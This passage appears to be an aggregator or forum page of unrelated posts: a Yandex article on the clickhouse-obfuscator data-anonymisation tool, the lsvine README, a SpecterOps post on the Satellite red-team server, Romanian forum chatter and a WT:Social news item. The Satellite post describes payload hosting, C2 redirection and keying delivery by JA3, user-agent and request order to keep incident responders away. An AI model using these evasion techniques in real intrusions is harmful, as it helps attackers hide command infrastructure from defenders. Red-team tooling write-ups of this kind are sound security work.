network generates a sequence of data, and thus dependencies in data must follow in the order of the sequence. But in our data, the order of columns can potentially be in reverse to dependencies between them. We didn't do anything to resolve this problem. As summer approached, we had the first working Python script that generated data. The data quality seemed decent at first glance: However, we did run into some difficulties: The size of the model is about a gigabyte. We tried to create a model for data that was several gigabytes in size (for a start). The fact that the resulting model is so large raises concerns. Would it be possible to extract the real data that it was trained on? Unlikely. But I don't know much about machine learning and neural networks, and I haven't read this developer's Python code, so how can I be sure? There were several articles published at the time about how to compress neural networks without loss of quality, but it wasn't implemented. On the one hand, this doesn't seem to be a serious problem, since we can opt out of publishing the model and just publish the generated data. On the other hand, if overfitting occurs, the generated data may contain some part of the source data. On a machine with a single CPU, the data generation speed is approximately 100 rows per second. Our goal was to generate at least a billion rows. Calculations showed that this wouldn't be completed before the date of the thesis defense. 
It didn't make sense to use additional hardware, because the goal was to make a data generation tool that could be used by anyone. Sharif tried to analyze the quality of data by comparing statistics. Among other things, he calculated the frequency of different characters occurring in the source data and in the generated data. The result was stunning: the most frequent characters were Ð and Ñ. Don't worry about Sharif, though. He successfully defended his thesis and then we happily forgot about the whole thing.

Mutation of compressed data

Let's assume that the problem statement has been reduced to a single point: we need to generate data that has the same compression ratio as the source data, and the data must decompress at the same speed. How can we achieve this? We need to edit compressed data bytes directly! This allows us to change the data without changing the size of the compressed data, plus everything will work fast. I wanted to try out this idea right away, despite the fact that the problem it solves is not the same one we started with. But that's how it always is.

So how do we edit a compressed file? Let's say we are only interested in LZ4. LZ4 compressed data is composed of sequences, which in turn are strings of not-compressed bytes (literals), followed by a match copy:

- Literals (copy the following N bytes as is).
- Matches with a minimum repeat length of 4 (repeat N bytes that were in the file at a distance of M).

Source data: Hello world Hello.
Compressed data (arbitrary example): literals 12 "Hello world " match 5 12.

In the compressed file, we leave "match" as-is, and change the byte values in "literals". As a result, after decompressing, we get a file in which all repeating sequences at least 4 bytes long are also repeated at the same distance, but they consist of a different set of bytes (basically, the modified file doesn't contain a single byte that was taken from the source file).

But how do we change the bytes? The answer isn't obvious, because in addition to the column types, the data also has its own internal, implicit structure that we would like to preserve. For example, text is often stored in UTF-8 encoding, and we want the generated data to also be valid UTF-8. I developed a simple heuristic that involves meeting several criteria:

- Null bytes and ASCII control characters are kept as-is.
- Some punctuation characters remain as-is.
- ASCII is converted to ASCII and for everything else the most significant bit is preserved (or an explicit set of "if" statements is written for different UTF-8 lengths).
- In one byte class a new value is picked uniformly at random.
- Fragments like https:// are preserved, otherwise it looks a bit silly.

The only caveat to this approach is that the data model is the source data itself, which means it cannot be published. The model is only fit for generating amounts of data no larger than the source. On the contrary, the previous approaches provide models which allow generating data of arbitrary size.
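A rough sketch of the byte-classing heuristic just described (an illustration only, not the actual tool's code); it mutates a byte string while keeping control bytes, some punctuation, and each byte's rough class:

# Sketch of the per-byte mutation heuristic: control bytes and some punctuation
# stay as-is, other ASCII maps to random ASCII letters/digits, and non-ASCII bytes
# keep only their most significant bit (a crude stand-in for UTF-8 awareness).
# Note: the real heuristic also leaves fragments like "https://" fully untouched.
import random
import string

PUNCT_KEEP = set(b"./:?&=#%-_")                        # punctuation kept as-is
ALNUM = [ord(c) for c in string.ascii_letters + string.digits]

def mutate(data: bytes, rng: random.Random) -> bytes:
    out = bytearray()
    for b in data:
        if b < 0x20 or b in PUNCT_KEEP:                # NUL, control chars, kept punctuation
            out.append(b)
        elif b < 0x80:                                 # other ASCII -> random letter/digit
            out.append(rng.choice(ALNUM))
        else:                                          # non-ASCII: keep the most significant bit
            out.append(0x80 | rng.randrange(0x80))
    return bytes(out)

print(mutate(b"https://www.yandex.ru/images/cats/?id=12345", random.Random(42)))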
Example for a URL:

http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXeAyAx
http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac
http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXe
http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac
http://ljc.she/kdoqdqwdbknvj.s/hmqhpsavon.yf#aortxqdvjja
http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja
http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht
http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja
http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht
http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja
http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu-702130

The results were positive and the data was interesting, but something wasn't quite right. The URLs kept the same structure, but in some of them it was too easy to recognize "yandex" or "avito" (a popular marketplace in Russia), so I created a heuristic that swaps some of the bytes around.

There were other concerns as well. For example, sensitive information could possibly reside in a FixedString column in binary representation and potentially consist of ASCII control characters and punctuation, which I decided to preserve. However, I didn't take data types into consideration. Another problem is that if a column stores data in the "length, value" format (this is how String columns are stored), how do I ensure that the length remains correct after the mutation? When I tried to fix this, I immediately lost interest.

Random permutations

Unfortunately, the problem wasn't solved. We performed a few experiments, and it just got worse. The only thing left was to sit around doing nothing and surf the web randomly, since the magic was gone. Luckily, I came across a page that explained the algorithm for rendering the death of the main character in the game Wolfenstein 3D. The animation is really well done — the screen fills up with blood. The article explains that this is actually a pseudorandom permutation. A random permutation of a set of elements is a randomly picked bijective (one-to-one) transformation of the set, or a mapping where each and every derived element corresponds to exactly one original element (and vice versa). In other words, it is a way to randomly iterate through all the elements of a data set. And that is exactly the process shown in the picture: each pixel is filled in random order, without any repetition. If we were to just choose a random pixel at each step, it would take a long time to get to the last one. The game uses a very simple algorithm for pseudorandom permutation called linear feedback shift register (LFSR).

Similar to pseudorandom number generators, random permutations, or rather their families, can be cryptographically strong when parametrized by a key. This is exactly what we need for data transformation. However, the details might be trickier. For example, cryptographically strong encryption of N bytes to N bytes with a pre-determined key and initialization vector seems like it would work for a pseudorandom permutation of a set of N-byte strings. Indeed, this is a one-to-one transformation and it appears to be random. But if we use the same transformation for all of our data, the result may be susceptible to cryptanalysis because the same initialization vector and key value are used multiple times. This is similar to the Electronic Codebook mode of operation for a block cipher. What are the possible ways to get a pseudorandom permutation?
We can take simple one-to-one transformations and build a complex function that looks random. Here are some of my favorite one-to-one transformations: Multiplication by an odd number (like a large prime number) in two's complement arithmetic. Xorshift: x ^= x >> N. CRC-N, where N is the number of bits in the argument. For example, three multiplications and two xorshift operations are used for the murmurhash finalizer. This operation is a pseudorandom permutation. However, I should point out that hash functions don't have to be one-to-one (even hashes of N bits to N bits). Or here's another interesting example from elementary number theory from Jeff Preshing's website. How can we use pseudorandom permutations to solve our problem? We can use them to transform all numeric fields so we can preserve the cardinalities and mutual cardinalities of all combinations of fields. In other words, COUNT(DISTINCT) will return the same value as before the transformation, and furthermore, with any GROUP BY. It is worth noting that preserving all cardinalities somewhat contradicts our goal of data anonymization. Let's say someone knows that the source data for site sessions contains a user who visited sites from 10 different countries, and they want to find that user in the transformed data. The transformed data also shows that the user visited sites from 10 different countries, which makes it easy to narrow down the search. Even if they find out what the user was transformed into, it won't be very useful, because all the other data has also been transformed, so they won't be able to figure out what sites the user visited or anything else. But these rules can be applied in a chain. For example, if someone knows that the most frequently occurring website in our data is Yandex, with Google in second place, they can just use ranking to determine which transformed site identifiers actually mean Yandex and Google. There's nothing surprising about this, since we are working with an informal problem statement and we are just trying to find a balance between anonymization of data (hiding information) and preserving data properties (disclosure of information). For information about how to approach the data anonymization issue more reliably, read this article. In addition to keeping the original cardinality of values, I also want to keep the order of magnitude of the values. What I mean is that if the source data contained numbers under 10, then I want the transformed numbers to also be small. How can we achieve this? For example, we can divide a set of possible values into size classes and perform permutations within each class separately (maintaining the size classes). The easiest way to do this is to take the nearest power of two or the position of the most significant bit in the number as the size class (these are the same thing). The numbers 0 and 1 will always remain as is. The numbers 2 and 3 will sometimes remain as is (with a probability of 1/2) and will sometimes be swapped (with a probability of 1/2). The set of numbers 1024..2047 will be mapped to one of 1024! (factorial) variants, and so on. For signed numbers, we will keep the sign. It's also doubtful whether we need a one-to-one function. We can probably just use a cryptographically strong hash function. The transformation won't be one-to-one, but the cardinality will be close to the same. 
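A small sketch of that last idea, under the assumption that a keyed hash is acceptable instead of a true permutation: keep the sign and the power-of-two size class of each number, and fill the remaining bits from an HMAC of the value (an illustration only, not the actual tool's code):

# Sketch: keyed transform of integers that preserves sign and order of magnitude.
# 0 and 1 map to themselves; other values stay within their power-of-two class.
import hashlib
import hmac

def transform(value: int, key: bytes) -> int:
    sign = -1 if value < 0 else 1
    magnitude = abs(value)
    if magnitude <= 1:
        return value                          # 0 and 1 are kept as-is
    bits = magnitude.bit_length()             # size class: [2**(bits-1), 2**bits - 1]
    low, high = 1 << (bits - 1), (1 << bits) - 1
    digest = hmac.new(key, magnitude.to_bytes(8, "big"), hashlib.sha256).digest()
    offset = int.from_bytes(digest[:8], "big") % (high - low + 1)
    return sign * (low + offset)

key = b"secret key"
for v in [0, 1, 3, 7, 42, 1500, -1500, 123456]:
    print(f"{v:>8} -> {transform(v, key):>8}")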
However, we do need a cryptographically strong random permutation so that when we define a key and derive a permutation with that key, it would be difficult to restore the original data from the rearranged data without knowing the key. There is one problem: in addition to knowing nothing about neural networks and machine learning, I am also quite ignorant when it comes to cryptography. That leaves just my courage. I was still reading random web pages, and found a link on Hacker News to a discussion on Fabien Sanglard's page. It had a link to a blog post by Redis developer Salvatore Sanfilippo that talked about using a wonderful generic way of getting random permutations, known as a Feistel network.

The Feistel network is iterative, consisting of rounds. Each round is a remarkable transformation that allows you to get a one-to-one function from any function. Let's look at how it works.

1. The argument's bits are divided into two halves:

   arg:   xxxxyyyy
   arg_l: xxxx
   arg_r: yyyy

2. The right half replaces the left. In its place we put the result of XOR on the initial value of the left half and the result of the function applied to the initial value of the right half, like this:

   res:   yyyyzzzz
   res_l = yyyy = arg_r
   res_r = zzzz = arg_l ^ F(arg_r)

There is also a claim that if we use a cryptographically strong pseudorandom function for F and apply a Feistel round at least 4 times, we'll get a cryptographically strong pseudorandom permutation. This is like a miracle: we take a function that produces random garbage based on data, insert it into the Feistel network, and we now have a function that produces random garbage based on data, yet is invertible! The Feistel network is at the heart of several data encryption algorithms.

What we're going to do is something like encryption, only it's really bad. There are two reasons for this:

- We are encrypting individual values independently and in the same way, similar to the Electronic Codebook mode of operation.
- We are storing information about the order of magnitude (the nearest power of two) and the sign of the value, which means that some values do not change at all.

This way we can obfuscate numeric fields while preserving the properties we need. For example, after using LZ4, the compression ratio should remain approximately the same, because the duplicate values in the source data will be repeated in the converted data, and at the same distances from each other.

Markov models

Text models are used for data compression, predictive input, speech recognition, and random string generation. A text model is a probability distribution of all possible strings. Let's say we have an imaginary probability distribution of the texts of all the books that humanity could ever write. To generate a string, we just take a random value with this distribution and return the resulting string (a random book that humanity could write). But how do we find out the probability distribution of all possible strings? First, this would require too much information. There are 256^10 possible strings that are 10 bytes in length, and it would take quite a lot of memory to explicitly write a table with the probability of each string. Second, we don't have enough statistics to accurately assess the distribution. This is why we use a probability distribution obtained from rough statistics as the text model. For example, we could calculate the probability of each letter occurring in the text, and then generate strings by selecting each next letter with the same probability.
This primitive model works, but the strings are still very unnatural. To improve the model slightly, we could also make use of the conditional probability of the letter's occurrence if it is preceded by N specific letters. N is a pre-set constant. Let's say N = 5 and we are calculating the probability of the letter "e" occurring after the letters "compr". This text model is called an Order-N Markov model.

P(cata | cat) = 0.8
P(catb | cat) = 0.05
P(catc | cat) = 0.1
...

Let's look at how Markov models work on the website of Hay Kranen. Unlike LSTM neural networks, the models only have enough memory for a small context of fixed-length N, so they generate funny, nonsensical texts. Markov models are also used in primitive methods for generating spam, and the generated texts can be easily distinguished from real ones by counting statistics that don't fit the model. There is one advantage: Markov models work much faster than neural networks, which is exactly what we need.

Example for Title (our examples are in Turkish because of the data used):

We can calculate statistics from the source data, create a Markov model, and generate new data with it. Note that the model needs smoothing to avoid disclosing information about rare combinations in the source data, but this is not a problem. I use a combination of models from 0 to N. If statistics are insufficient for the model of order N, the N−1 model is used instead.

But we still want to preserve the cardinality of data. In other words, if the source data had 123456 unique URL values, the result should have approximately the same number of unique values. We can use a deterministically initialized random number generator to achieve this. The easiest way to do this is to use a hash function and apply it to the original value. In other words, we get a pseudorandom result that is explicitly determined by the original value.

Another requirement is that the source data may have many different URLs that start with the same prefix but aren't identical. For example: https://www.yandex.ru/images/cats/?id=xxxxxx. We want the result to also have URLs that all start with the same prefix, but a different one. For example: http://ftp.google.kz/cgi-bin/index.phtml?item=xxxxxx. As a random number generator for generating the next character using a Markov model, we'll take a hash function from a moving window of 8 bytes at the specified position (instead of taking it from the entire string).

https://www.yandex.ru/images/cats/?id=12345
                      ^^^^^^^^

distribution: [aaaa][b][cc][dddd][e][ff][ggggg][h]...
hash("images/c") % total_count:      ^

http://ftp.google.kz/cg...

It turns out to be exactly what we need.
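To make the order-N idea concrete, here is a minimal character-level Markov generator (an illustration only; the real tool also applies smoothing, model-order fallback, and the keyed sliding-window hashing described above, and the training strings below are placeholders). Sample titles generated by the real tool follow.

# Sketch: order-N character-level Markov model trained on a few sample strings.
# It counts follow-up characters for every N-character context, then samples from them.
import random
from collections import Counter, defaultdict

def train(samples, order=3):
    model = defaultdict(Counter)
    for text in samples:
        padded = " " * order + text
        for i in range(order, len(padded)):
            model[padded[i - order:i]][padded[i]] += 1
    return model

def generate(model, order=3, length=40, rng=None):
    rng = rng or random.Random(0)
    out = " " * order
    for _ in range(length):
        counts = model.get(out[-order:])
        if not counts:
            break
        chars, weights = zip(*counts.items())
        out += rng.choices(chars, weights=weights)[0]
    return out.strip()

samples = ["photo funia haber spor", "photo galeri son dakika", "spor haberleri ve oyun"]  # placeholders
print(generate(train(samples)))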
Here's the example of page titles: PhotoFunia - Haber7 - Hava mükemment.net Oynamak içinde şaşıracak haber, Oyunu Oynanılmaz • apród.hu kínálatában - RT Arabic PhotoFunia - Kinobar.Net - apród: Ingyenes | Posti PhotoFunia - Peg Perfeo - Castika, Sıradışı Deniz Lokoning Your Code, sire Eminema.tv/ PhotoFunia - TUT.BY - Your Ayakkanın ve Son Dakika Spor, PhotoFunia - big film izle, Del Meireles offilim, Samsung DealeXtreme Değerler NEWSru.com.tv, Smotri.com Mobile yapmak Okey PhotoFunia 5 | Galaxy, gt, după ce anal bilgi yarak Ceza RE050A V-Stranç PhotoFunia :: Miami olacaksını yerel Haberler Oyun Young video PhotoFunia Monstelli'nin En İyi kisa.com.tr –Star Thunder Ekranı PhotoFunia Seks - Politika,Ekonomi,Spor GTA SANAYİ VE PhotoFunia Taker-Rating Star TV Resmi Söylenen Yatağa każdy dzież wierzchnie PhotoFunia TourIndex.Marketime oyunu Oyna Geldolları Mynet Spor,Magazin,Haberler yerel Haberleri ve Solvia, korkusuz Ev SahneTv PhotoFunia todo in the Gratis Perky Parti'nin yapıyı bu fotogram PhotoFunian Dünyasın takımız halles en kulları - TEZ Results After trying four methods, I got so tired of this problem that it was time to just choose something, make it into a usable tool, and announce the solution. I chose the solution that uses random permutations and Markov models parametrized by a key. It is implemented as the clickhouse-obfuscator program, which is very easy to use. The input is a table dump in any supported format (such as CSV or JSONEachRow), and the command line parameters specify the table structure (column names and types) and the secret key (any string, which you can forget immediately after use). The output is the same number of rows of obfuscated data. The program is installed with clickhouse-client, has no dependencies, and works on almost any flavor of Linux. You can apply it to any database dump, not just ClickHouse. For instance, you can generate test data from MySQL or PostgreSQL databases or create development databases that are similar to your production databases. clickhouse-obfuscator \ --seed "$(head -c16 /dev/urandom | base64)" \ --input-format TSV --output-format TSV \ --structure 'CounterID UInt32, URLDomain String, \ URL String, SearchPhrase String, Title String' \ < table.tsv > result.tsv clickhouse-obfuscator --help Of course, everything isn't so cut and dried, because data transformed by this program is almost completely reversible. The question is whether it is possible to perform the reverse transformation without knowing the key. If the transformation used a cryptographic algorithm, this operation would be as difficult as a brute-force search. Although the transformation uses some cryptographic primitives, they are not used in the correct way, and the data is susceptible to certain methods of analysis. To avoid problems, these issues are covered in the documentation for the program (access it using --help). In the end, we transformed the data set we need for functional and performance testing and the Yandex VP of data security approved publication. clickhouse-datasets.s3.yandex.net/hits/tsv/hits_v1.tsv.xz clickhouse-datasets.s3.yandex.net/visits/tsv/visits_v1.tsv.xz Non-Yandex developers use this data for real performance testing when optimizing algorithms inside ClickHouse. Third-party users can provide us with their obfuscated data so that we can make ClickHouse even faster for them. 
We also released an independent open benchmark for hardware and cloud providers on top of this data: clickhouse.yandex/benchmark_hardware.html

Source: https://habr.com/en/company/yandex/blog/485096/
7. Motivation

I built lsvine to be like tree, but with the first-level directories distributed horizontally (and dangling downwards, hence like a vine). This format compacts the information vertically and displays it in a Trello-like format, one "card" per directory.

Screenshots: see the repository.

Installation

With cargo:

cargo install lsvine

Downloadable binary for 64-bit Linux:

LSVINE_VERSION=0.3.1
wget https://github.com/autofitcloud/lsvine/releases/download/$LSVINE_VERSION/lsvine-v$LSVINE_VERSION-x86_64-unknown-linux-musl.tar.gz
tar -xzf lsvine-v$LSVINE_VERSION-x86_64-unknown-linux-musl.tar.gz
mv lsvine ~/.local/bin/

Usage

Regular usage:

# lsvine --version
lsvine 0.3.1

# lsvine .
+---------------+------------------------------------------------+-------------+---------+---------------------------+---------+
| .             | dist                                           | screenshots | src     | target                    | testdir |
+---------------+------------------------------------------------+-------------+---------+---------------------------+---------+
| CHANGELOG     | lsvine-v0.2.1-x86_64-unknown-linux-musl.tar.gz | ls.png      | main.rs | release                   | test1   |
| Cargo.lock    |                                                | lsvine.png  |         | x86_64-unknown-linux-musl | test2   |
| Cargo.toml    |                                                | tree.png    |         |                           | test3   |
| DEVELOPER.md  |                                                |             |         |                           |         |
| LICENSE       |                                                |             |         |                           |         |
| README.md     |                                                |             |         |                           |         |
| build.sh      |                                                |             |         |                           |         |
| mk_testdir.sh |                                                |             |         |                           |         |
+---------------+------------------------------------------------+-------------+---------+---------------------------+---------+

Show hidden filenames:

# lsvine -a
+----------------+----------------+------------------------------------------------+-----------------------+-------------------------------+---------------------------+----------+-------------------------------+
| .              | .git           | dist                                           | screenshots           | src                           | target                    | testdir  | tests                         |
+----------------+----------------+------------------------------------------------+-----------------------+-------------------------------+---------------------------+----------+-------------------------------+
| .README.md.swp | COMMIT_EDITMSG | .gitkeep                                       | sideBySide-latest.png | level1dir.rs                  | .gitkeep                  | .gitkeep | test_tablebuf.rs              |
| .gitignore     | FETCH_HEAD     | lsvine-v0.3.1-x86_64-unknown-linux-musl.tar.gz |                       | longest_common_prefix.rs      | .rustc_info.json          | test1    | vecpath2vecl1dir_iterators.rs |
| CHANGELOG      | HEAD           |                                                |                       | main.rs                       | package                   | test2    | vecpath2vecl1dir_onefunc.rs   |
| Cargo.lock     | ORIG_HEAD      |                                                |                       | main_bkp_onefunc.rs           | release                   | test3    |                               |
| Cargo.toml     | branches       |                                                |                       | tablebuf.rs                   | x86_64-unknown-linux-musl |          |                               |
| DEVELOPER.md   | config         |                                                |                       | vecpath2vecl1dir_iterators.rs |                           |          |                               |
| LICENSE        | description    |                                                |                       | vecpath2vecl1dir_onefunc.rs   |                           |          |                               |
| README.md      | hooks          |                                                |                       |                               |                           |          |                               |
| build.sh       | index          |                                                |                       |                               |                           |          |                               |
| mk_testdir.sh  | info           |                                                |                       |                               |                           |          |                               |
|                | logs           |                                                |                       |                               |                           |          |                               |
|                | objects        |                                                |                       |                               |                           |          |                               |
|                | refs           |                                                |                       |                               |                           |          |                               |
+----------------+----------------+------------------------------------------------+-----------------------+-------------------------------+---------------------------+----------+-------------------------------+

Contract filename suffixes to reduce occupied screen space further:

# lsvine testdir/test1
+----+----+----+-----+
| .  | d1 | d2 | d3  |
+----+----+----+-----+
| f1 | f4 | f7 | d4  |
| f2 | f5 | f8 | f10 |
| f3 | f6 | f9 | f11 |
|    |    |    | f12 |
|    |    |    | f13 |
|    |    |    | f14 |
+----+----+----+-----+

# lsvine testdir/test1 --contract-suffix
+--------+--------+--------+---------+
| .      | d1     | d2     | d3      |
+--------+--------+--------+---------+
| f* (3) | f* (3) | f* (3) | d4      |
|        |        |        | f1* (5) |
+--------+--------+--------+---------+

# lsvine testdir/test1 --contract-suffix --minimum-prefix-length=2
+----+----+----+---------+
| .  | d1 | d2 | d3      |
+----+----+----+---------+
| f1 | f4 | f7 | d4      |
| f2 | f5 | f8 | f1* (5) |
| f3 | f6 | f9 |         |
+----+----+----+---------+

For example, lsvine -c -m 3 /etc (output linked in the README).

The future

At some point, lsvine might get merged into other popular Rust-based modern ls alternatives. It could be implemented as a separate option, e.g. exa --vine or lsd --vine.

Example repos:

exa
(pro) It already has a long grid view
(con) The author seems too busy to dequeue issues and PRs
(con) The README doesn't list "download binary from releases and run", though the website https://the.exa.website/ does list a downloadable binary

lsd
(pro) Distributed via snap, in addition to the other channels that exa uses
(con) Requires some fonts as a prerequisite

Others at the GitHub topic "ls".

License

Apache License 2.0. Check the LICENSE file.

Dev notes

Check DEVELOPER.md.

Author

Built by AutofitCloud.

Source: https://github.com/autofitcloud/lsvine
8. Satellite is an alternative to Apache and Nginx for payload hosting, as well as an alternative to Caddy for C2 traffic redirection. I focused on making the project feature-rich, easy to use, and reliable. The source and compiled binaries can be found on GitHub.

During my internship at SpecterOps this past summer, I had the opportunity to sit next to Lee Christensen, who gave me the idea to pursue this project. He thought it would be cool if an operator could key their payload downloads based on JA3 signatures. I mocked up a basic web server that would only serve requests if they matched a predefined JA3 signature, using CapacitorSet's ja3-server package as a model. (For those not familiar with JA3, check out the writeup I contributed to, Impersonating JA3 Fingerprints.) Once I had the skeleton for payload delivery and HTTP proxying, I took on the task of creating a drop-in replacement for Apache mod_rewrite and Nginx. Satellite now has the ability to filter traffic based on the number of times a payload has been served, the User-Agent, JA3 signatures, prerequisite paths (which I'll show off later), and more. Satellite is not intended to provide the flexibility of mod_rewrite, but instead to enable easy payload delivery keying, with features almost impossible to replicate in mod_rewrite.

Feature Highlights

JA3 Payload Delivery Keying
Request Order Payload Delivery Keying
Configurable Payload Lifetime
C2 Traffic Redirection (Proxying)
Scriptable Request Keying
Easy Credential Capture
Global Request Filtering

How to Install

As previously mentioned, a large focus of the project was to make traffic keying easy to set up. This extends from usage to installation. The easiest installation method is the Debian software package (.deb) on a Debian-based system, which only requires downloading the file and using dpkg to install it. You can use the Installation wiki page to learn how to install Satellite on non-Debian systems.

Route Configuration

In Satellite, a route is the page requested by the user. The content of a route can be configured in the same way one configures a route in Apache or Nginx: put a file in the server root. By default, Satellite uses /var/www/html as the directory to serve files from, but that can be changed in the server config. Once Satellite is installed and running, you can begin serving pages.

The ".info" file is where the magic of Satellite happens. The ".info" file is a YAML file that specifies what special actions should happen when a file is requested. These actions can either be keying options to protect a payload from unwanted requests (for example, from a member of the blue team) or directives like on_failure, which specifies what should happen to the request if the key does not match.

In addition to serving files, operators can also use the same keying options for traffic redirection using the proxy option. There is a special file in the server_root called proxy.yml which allows users to make a list of routes they'd like to proxy without having to create a dummy file. The proxy file works the same as a normal ".info" file, so the keying options that work on a payload also work with proxying. See the proxy example on GitHub for an in-depth explanation.

I'll go over a few keying options to solidify the point. First, the serve option allows operators to specify how many times they'd like a file to be served before it becomes inaccessible. This is a useful option when a payload only has one target.
When the target downloads the file, the payload is no longer accessible through the web server.

Next is blacklist_useragents. As the name implies, one can blacklist User-Agents from accessing a payload. The field matches a regular expression, so an operator can approximate blocking Linux clients by using:

blacklist_useragents:
  - *Linux*

Next, and maybe the most important, is on_failure. This option specifies what happens when a request fails to match a key. I'll go more in-depth about on_failure in the Server Configuration section.

Prereq Directive

Next, the prereq directive is a really simple way to force requesters to access a set of paths before accessing another. This is useful when an operator uses ClickOnce for initial access. The ClickOnce application will first request the path /<name>/tracker.jpg before accessing ClickOnce.application. Using the prereq directive, an operator is able to deny access to ClickOnce.application if the requester has not requested /<name>/tracker.jpg.

For a simple example, if an operator knows their payload will request /a.jpeg and /metadata.json before it finally requests /payload, the operator can use the contents of the following file, payload.info, to only serve /payload once /a.jpeg and /metadata.json have been requested:

prereq:
  - /a.jpeg
  - /metadata.json

The example in the wiki shows how an operator can stack prereqs to force users to request one path after another. There are many ways this could be implemented, so understanding how it works is important. First, Satellite tracks users based on IP addresses, since cookies may not be obeyed by the client. This means that if several requesters share the same external IP, Satellite could fail to serve the payload even if one of them requested each page in order. Second, requests are matched consecutively, limited by the number of paths in the prereq list. This means that if the prereq directive states "access /one, then access /two, before accessing /payload" and the user requests "/three, /one, /two, /payload," Satellite will serve the payload. Using the same example, Satellite will not serve the request sequence "/two, /one, /payload" (see the short sketch below). Testing this technique doesn't work very well in browsers (especially Chrome), because requests are typically performed multiple times for preemptive rendering and caching reasons.

authorized_ja3

Last, authorized_ja3 only allows specific JA3 signatures to access the payload. In my opinion, this is less useful for payload hosting unless you do intelligence gathering beforehand, but it is extremely powerful for redirector proxying. JA3 signatures tend to stay the same across instances of a C2 agent, unless the agent uses the operating system's HTTP library for making calls and therefore presents varying JA3 signatures. In the case of static C2 agent JA3 signatures, you can key a Satellite route to only communicate with requesters that match a predefined C2 agent's JA3 signature. This technique is useful to hide characteristics of a backend C2 server and the true purpose of a configured proxy route. For example, during an ongoing IR investigation, an incident responder could pull proxy/netflow data for your C2 channel and mimic a request to the redirector's configured route. However, unless they can also identify and replicate arbitrary JA3 signatures (ja3transport), they will not be able to directly interact with the backend C2 server, hiding the true nature of a route and preventing C2 server fingerprinting.
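Returning to the prereq directive for a moment, here is a toy Python sketch of the consecutive, IP-keyed matching behavior described above. It only illustrates the semantics from the post (Satellite's actual implementation may differ), and every name in it, PREREQS, should_serve, the history size, and the example IP, is made up for the illustration.

from collections import defaultdict, deque

# Hypothetical route table: payload path -> ordered prerequisite paths.
PREREQS = {"/payload": ["/one", "/two"]}

# Per-IP rolling history of requested paths; tracking is by IP because the
# client may not obey cookies.
history = defaultdict(lambda: deque(maxlen=16))

def should_serve(ip, path):
    # Serve `path` only if this IP's most recent requests end with the
    # prerequisite paths, in order.
    prereq = PREREQS.get(path)
    if prereq is None:                      # no keying on this route
        history[ip].append(path)
        return True
    recent = list(history[ip])[-len(prereq):]
    ok = (recent == prereq)
    history[ip].append(path)
    return ok

# The two sequences described in the post:
for p in ["/three", "/one", "/two", "/payload"]:
    served = should_serve("203.0.113.7", p)
print(served)   # True:  "/three, /one, /two, /payload" is served

history.clear()
for p in ["/two", "/one", "/payload"]:
    served = should_serve("203.0.113.7", p)
print(served)   # False: "/two, /one, /payload" is not served

The point of the sketch is only that the match is order-sensitive and limited to the last len(prereq) requests from a given IP, which is why extra unrelated requests beforehand do not break the key, but requesting the prerequisites out of order does.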
Global Conditions

If an operator has a list of keys they know they want to use for every operation, global conditions can be applied. Files placed in the /etc/satellite/conditions/ directory will be combined and applied to all Satellite requests. An example and a deeper explanation can be found on the wiki.

There are many more options to check out, like authorized_countries, prereq, and blacklist_iprange, which are listed on the Route Configuration wiki page.

Server Configuration

Out of the box, there is no required configuration in order to start serving pages. Satellite looks in three places to find its server configuration: $HOME/.config/satellite/config.yml, $HOME/.satellite/config.yml, and /etc/satellite/config.yml. Once a valid configuration file is found, Satellite validates the configuration settings and starts the server.

Satellite's server configuration options will be familiar if you've used other web servers like Apache or Nginx. For example, the default index, the listening port, and the server header are configurable. I'll mention two things which are a bit different from normal web servers. The not_found option has either a redirect or a render subkey: the redirect option performs a "301 redirect" to a specified site, while the render option performs a "200 OK" render of the specified page. The not_found option also acts as the default catch-all when a route does not match a request and does not specify a not_found option itself.

Example

Here is a video of how to use Satellite to key a payload.

Source: https://posts.specterops.io/satellite-a-payload-and-proxy-service-for-red-team-operations-aa4500d3d970
9. The guy wants to spy on the world, javababy, and doesn't know how; his backside is itching from nettles and carrots.
10. Well yes, well no. Try it with a live system, make a backup, and afterwards you can play around as much as you want. PS: here https://www.thecyberhelpline.com/guides/screenlocking-ransomware
11. Nothing will happen to it, don't worry, the man told you the reality. Try with a live boot; I tend to believe it's just a screen lock.
12. Oh come on, take a stroll through Ferentari with the phones on you: "got a light?"
13. I posted something similar; I haven't downloaded the sample to analyze it.
14. Let me catch you asking for filelist accounts again; now, while it's hot, you're the one making a big fuss.
15. You sell it and get into the network with "the boys". It's surely stolen; any warranty, import certificate, anything? Edit: there are discounts right now on eMAG, Altex, Amazon, etc.
  16. "Now users can open a social network only by invitation or by making a donation to support the project: $ 12.99 per month or $ 100 per year." Poti intra si cu invitatie
17. Wikipedia co-founder Jimmy Wales has launched a new online social network that he hopes will rival Facebook and Twitter in order to combat "clickbait" and "misleading headlines," the Financial Times reports. WT:Social, the site of his new social network, lets users share links to news articles which are then discussed in a Facebook-style news feed. Topics range from politics and technology to heavy metal and beekeeping. Although the company has no connection to Wikipedia, Wales has borrowed the online encyclopedia's business model. WT:Social will rely on donations from a small subset of users to allow the network to run without the ads that he blames for encouraging the wrong kind of engagement on social networks. "The business model of social media companies, of pure advertising, is problematic," Wales said. "It turns out the big winner is low-quality content," he added. While Facebook's and Twitter's algorithms ensure that the posts with the most comments or likes appear first, WT:Social displays the newest links first. However, WT:Social hopes to add an "up arrow" button that lets users recommend quality posts. Since its launch last month, WT:Social is approaching 50,000 users, according to Wales, with their number doubling in the last week. Still, that is far from Facebook's audience of more than 2 billion. "Obviously, the ambition is not 50,000 or 500,000, but 50 million and 500 million," Wales said. More than 200 people have donated to support the site, he said, pointing to the success of Netflix, Spotify and New York Times subscriptions as proof that a new generation of consumers is ready to pay for "relevant" online content. Via: http://www.ziare.com/facebook/utilizatori/cofondatorul-wikipedia-lanseaza-o-retea-de-socializare-sa-rivalizeze-cu-facebook-si-twitter-1585839
